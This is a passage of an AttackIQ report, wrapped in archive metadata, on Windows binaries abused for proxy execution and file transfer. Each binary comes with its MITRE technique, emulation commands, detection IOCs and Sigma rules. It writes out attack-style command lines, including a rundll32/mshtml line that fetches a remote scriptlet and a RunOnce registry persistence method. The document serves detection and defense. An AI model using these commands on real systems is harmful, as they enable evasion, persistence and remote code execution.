Rules\r\n/rules/windows/process_creation/proc_creation_win_regsvr32_anomalies.yml\r\nBack to Top\r\nReplace.exe\r\nBinary description\r\n“replace.exe” is a command-line utility in Windows that is used to replace one or more files with another file. The utility is\r\ncommonly used to automate file replacement tasks or to replace files in batch scripts.\r\nTTPs and tactics\r\nCommand and Control: Ingress Tool Transfer (T1105)\r\nHow do the adversaries use it?\r\nAdversaries may use print.exe to copy a file into the system.\r\nAttackIQ Scenarios\r\nCopy a file using “replace.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nreplace.exe helloworld.exe $env:temp /A\r\nThe scenario will be marked as Not Prevented if the file exists en the temp folder.\r\nExecution\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 41 of 50\n\n(Click for Larger)\r\nScenario IOCs\r\n[((process:command_line LIKE '%/a%' OR process:command_line LIKE '%-a%') AND process:binary_ref.name LIKE\r\n'%\\replace.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nreplace.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml\r\nBack to Top\r\nRunonce.exe\r\nBinary description\r\nRunOnce.exe is a legitimate Windows executable file that is used to run programs or commands during the boot process of a\r\nWindows system. Specifically, it is part of the Windows RunOnce registry key, which is designed to execute a set of\r\ncommands or applications once, usually during the next system boot.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nHow do the adversaries use it?\r\nAn adversary could use the RunOnce registry key to execute a program or command in an attempt to evade defenses.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “runonce.exe” Script\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 42 of 50\n\nDescription\r\nhis scenario will create a new registry key in the HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components key.\r\nThe key will contain the following subkeys:\r\n‘@’: “attackiq_created”\r\n‘StubPath’: “$pwd\\AIQ_file_creator.exe”\r\nWhere $pwd will point to the scenario’s current working directory.\r\nIf the scenario is able to create the keys, it will then execute the following command:\r\nrunonce.exe /AlternateShellStartup\r\nThe binary AIQ_file_creator.exe will create a file in the temp directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. The scenario will be marked as prevented if\r\nthe file does not exist.\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\runonce.exe') AND (process:command_line LIKE '%/AlternateShellStartup%' OR\r\nprocess:command_line LIKE '%/r'))]\r\n[((((windows-registry-key:values[].data NOT LIKE '\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\\\%' AND\r\nwindows-registry-key:values[].data NOT LIKE '\"C:\\Program Files\\Microsoft\\Edge\\Application\\\\%') OR windows-registry-key:values[].data NOT LIKE '%\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --\r\nsystem-level --msedge --channel=stable') AND (windows-registry-key:values[].data NOT LIKE '\"C:\\Program\r\nFiles\\Google\\Chrome\\Application\\\\%' OR windows-registry-key:values[*].data NOT LIKE '%\\Installer\\chrmstp.exe\" -\r\n-configure-user-settings --verbose-logging --system-level%')) AND (windows-registry-key:key LIKE '%\\StubPath'\r\nAND windows-registry-key:key LIKE 'HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nrunonce.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml\r\n/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml\r\nBack to Top\r\nRundll32.exe\r\nBinary description\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 43 of 50\n\nrundll32.exe is a system process in Microsoft Windows operating systems that is responsible for executing 32-bit dynamic\r\nlink library (DLL) files.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution: Rundll32 (T1218.011)\r\nHow do the adversaries use it?\r\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\r\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to\r\nthis:  rundll32.exe\r\njavascript:\"..\\mshtml,RunHTMLApplication\";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\r\nbehavior has been seen used by malware such as Poweliks.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “rundll32.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nrundll32.exe javascript:\"\\..\\mshtml.dll,RunHTMLApplication\r\n\";eval(\"w=new%20ActiveXObject(\\\"WScript.Shell\\\");w.run(\\\"aiq_binary_file_creation.exe\\\");window.close()\");\r\nThe binary aiq_binary_file_creation.exe will create a file in the C:\\Users\\Public directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. If the file does not exist, the scenario will\r\nbe marked as prevented.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[(process:command_line LIKE '%RunHTMLApplication%' AND process:command_line LIKE '%\\..\\\\%' AND\r\nprocess:command_line LIKE '%mshtml%')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\ncmd.exe → rundll32.exe → aiq_file_creator.exe\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 44 of 50\n\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml\r\nBack to Top\r\nScriptrunner.exe\r\nBinary description\r\nScriptrunner.exe is a legitimate executable that is part of the Microsoft Windows operating system. It is used for executing\r\nscripts written in VBScript or JScript languages.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nHow do the adversaries use it?\r\nAdversaries could use scriptrunner to proxy execute malicious binaries using the -appvscript parameter.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “scriptrunner.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nScriptRunner.exe -appvscript AIQ_file_creator.exe\r\nThe binary AIQ_file_creator.exe will create a file in the TEMP directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. If the file does not exist, the scenario will\r\nbe marked as prevented.\r\nExecution\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 45 of 50\n\n(Click for Larger)\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\ScriptRunner.exe') AND process:command_line LIKE '% -appvscript %')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nscriptrunner.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml\r\nBack to Top\r\nTtdinject.exe\r\nBinary description\r\nTtdinject.ext is a legitimate Windows executable file that is used by ttracer.exe to Windbg Time Travel Debugging.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nHow do the adversaries use it?\r\nAdversaries may use it to proxy execute a malicious file.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “ttdinject.exe” Script\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 46 of 50\n\nDescription\r\nThis scenario will execute the following command:\r\nTTDInject.exe /ClientParams \"17 aiq_ttdinject.run 0 0 0 0 0 0 0 0 0 0\" /Launch \"AIQ_file_creator.exe\"\r\nThe binary AIQ_file_creator.exe will create a file in the temp directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. If the file does not exist, the scenario will\r\nbe marked as prevented.\r\nThis scenario requires admin privileges.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[(process:binary_ref.name LIKE '%ttdinject.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nttdinject.exe → aiq_file_creator.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml\r\nBack to Top\r\nTttracer.exe\r\nBinary description\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 47 of 50\n\nTtdinject.ext is a legitimate Windows executable file that is used to Windbg Time Travel Debugging.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nHow do the adversaries use it?\r\nAdversaries may use it to proxy execute a malicious file.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “tttracer.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\ntttracer.exe \"AIQ_file_creator.exe\"\r\nThe binary AIQ_file_creator.exe will create a file in the temp directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. If the file does not exist, the scenario will\r\nbe marked as prevented.\r\nThis scenario requires admin privileges.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[process:parent_ref.binary_ref.name LIKE '%\\tttracer.exe']\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\ntttracer.exe → aiq_file_creator.exe\r\nin addition, ttdinject.exe is also being called:\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\ntttracer.exe → ttdinject.exe\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 48 of 50\n\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml\r\nBack to Top\r\nVbc.exe\r\nBinary description\r\nVBC.exe is a file that is associated with the Visual Basic .NET compiler, which is part of the Microsoft .NET Framework.\r\nVBC stands for “Visual Basic Compiler.”\r\nTTPs and tactics\r\nDefense Evasion: Obfuscated Files or Information: Compile After Delivery (T1027.004)\r\nHow do the adversaries use it?\r\nAn attacker can deliver a source code file containing the malicious code to the target system and then use vbc.exe to compile\r\nthe code into an executable file. By compiling the code on the target system, the attacker can avoid detection by security\r\nsoftware that may have signatures or behavioral patterns for known malicious executables.\r\nThe use of vbc.exe in this context requires that the attacker has already gained access to the target system and has the\r\nnecessary permissions to execute the compiler. Once the code is compiled, the attacker can execute it to achieve their\r\nmalicious goals, such as stealing sensitive data or taking control of the compromised system.\r\nAttackIQ Scenarios\r\nCompile After Delivery using “vbc.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nvbc.exe /target:exe aiq_vb_code.vb\r\nThe content of the aiq_vb_code.vb is:\r\nImports System.IO\r\nModule Program\r\nSub Main()\r\nConsole.WriteLine(\"AttackIQ compiled visual basic program has been spawned.\")\r\nEnd Sub\r\nEnd Module\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 49 of 50\n\nAfter compiling the binary, the scenario will execute the compiled file and search for the message in the stdout.\r\nThe scenario will be marked as Not Prevented if the message “AttackIQ compiled visual basic program has been spawned”\r\nis present in the stdout of the compiled binary execution.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[(process:binary_ref.name LIKE '%\\cvtres.exe' AND process:parent_ref.binary_ref.name LIKE '%\\vbc.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nvbc.exe → cvtres.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml\r\nBack to Top\r\nSource: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 50 of 50",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/"
	],
	"report_names": [
		"hiding-in-plain-sight"
	],
	"threat_actors": [],
	"ts_created_at": 1775434018,
	"ts_updated_at": 1775826754,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ddb9d132d9af5d74f0fb6b8cd6c3f8f829fdca55.pdf",
		"text": "https://archive.orkl.eu/ddb9d132d9af5d74f0fb6b8cd6c3f8f829fdca55.txt",
		"img": "https://archive.orkl.eu/ddb9d132d9af5d74f0fb6b8cd6c3f8f829fdca55.jpg"
	}
}